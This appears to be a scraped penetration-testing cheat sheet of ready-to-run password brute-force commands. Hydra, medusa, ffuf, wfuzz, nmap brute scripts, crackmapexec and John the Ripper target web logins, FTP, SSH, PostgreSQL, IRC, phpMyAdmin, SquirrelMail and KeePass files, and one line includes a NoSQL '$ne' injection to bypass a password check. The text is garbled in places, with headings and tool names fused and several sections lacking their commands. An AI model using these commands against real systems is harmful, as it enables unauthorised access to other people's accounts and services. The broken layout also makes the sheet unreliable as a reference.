Bruteforce
Basic Auth
hydra
medusaForm Auth
hydra
hydra $IP http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f
ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206
wfuzz -c -z file,<USER_NAMES_FILE> --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://$URL
FTP
hydra
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
SSH
hydra
nmapnmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
--script-args ssh-brute.timeout=4s <target>
SMB
crackmapexec
hydraRDP
ncrack
hydra crowbarmysql
medusa
hydrapssql
hydra
medusa ncrack patator metasploit nmapnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 $IP
WinRm
crackmapexec - brute force
crackmapexec - check a pair of credentials crackmapexec - check if the creds are valid to access winrmIRC
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -p 6697 $IP
kdbx
keepass2john CEH.kdbx > ceh.hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
kpcli --kdb CEH.kdbx
VNC
hydra
ncrack medusaUnshadow
john hashcatCrack id_rsa
Crack nt hash
phpmyadmin
hydra
export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
hydra -F -vV -l root -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&token=a6afebdd3311fac747d68adb1a8bd7ca:denied"
medusa
medusa \
-h $IP \
-u root \
-P /usr/share/wordlists/rockyou.txt \
-M web-form \
-m FORM:"phpmyadmin/index.php" \
-m DENY-SIGNAL:"denied" \
-m FORM-DATA:"post?pma_username=&pma_password=&server=1&&token=i=TQRF[zI*sEkNu@"
SquirrelMail 1.2.10
hydra
hydra -l <USER> -P <PASS_FILE> $IP http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u